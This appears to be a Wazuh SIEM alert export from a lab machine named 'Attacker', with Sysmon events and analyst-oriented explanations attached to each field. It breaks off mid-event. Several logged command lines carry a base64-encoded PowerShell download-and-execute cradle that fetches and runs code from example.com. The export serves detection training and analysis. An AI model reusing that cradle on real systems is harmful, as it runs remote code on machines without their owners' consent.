data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:58.543
ProcessGuid: {94294ddc-bd44-680a-5d0b-000000000e00}
ProcessId: 5188
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_3tsd2bll.s43.ps1
CreationUtcTime: 2025-04-24 22:37:58.543
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:58.543 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd44-680a-5d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5188 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3tsd2bll.s43.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:58.543 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 63 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534283.1531501 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:00.8075389Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284198 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:59.419
ProcessGuid: {94294ddc-bd47-680a-610b-000000000e00}
ProcessId: 15132
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd44-680a-5d0b-000000000e00}
ParentProcessId: 5188
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:59.419 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd47-680a-610b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15132 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd44-680a-5d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 5188 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 67 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534283.1539568 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:01.2115486Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284199 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:01.067
ProcessGuid: {94294ddc-bd47-680a-610b-000000000e00}
ProcessId: 15132
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_1iubx32l.gko.ps1
CreationUtcTime: 2025-04-24 22:38:01.067
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:01.067 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd47-680a-610b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15132 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1iubx32l.gko.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:01.067 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from failed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from failed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from failed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19013 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.6.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['3.3', '8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534284.1542337 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26157 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Detailed File Share' is set to include 'Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory allows you to audit attempts to access files and folders on a shared folder. Events for this subcategory include: - 5145: network share object was checked to see whether client can be granted desired access. The recommended state for this setting is to include: Failure. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing the Failures will log which unauthorized users attempted (and failed) to get access to a file or folder on a network share on this computer, which could possibly be an indication of malicious intent. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Detailed File Share Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 3.3,8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Detailed File Share"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'auditpol.exe /get /subcategory:"Detailed File Share"' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: failed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 64 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534290.1545402 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:07.6419042Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284255 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:02.808
ProcessGuid: {94294ddc-bd4a-680a-660b-000000000e00}
ProcessId: 10844
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd47-680a-610b-000000000e00}
ParentProcessId: 15132
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:02.808 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd4a-680a-660b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10844 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd47-680a-610b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 15132 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 68 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534290.1553473 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:07.8488294Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284256 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:07.834
ProcessGuid: {94294ddc-bd4a-680a-660b-000000000e00}
ProcessId: 10844
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
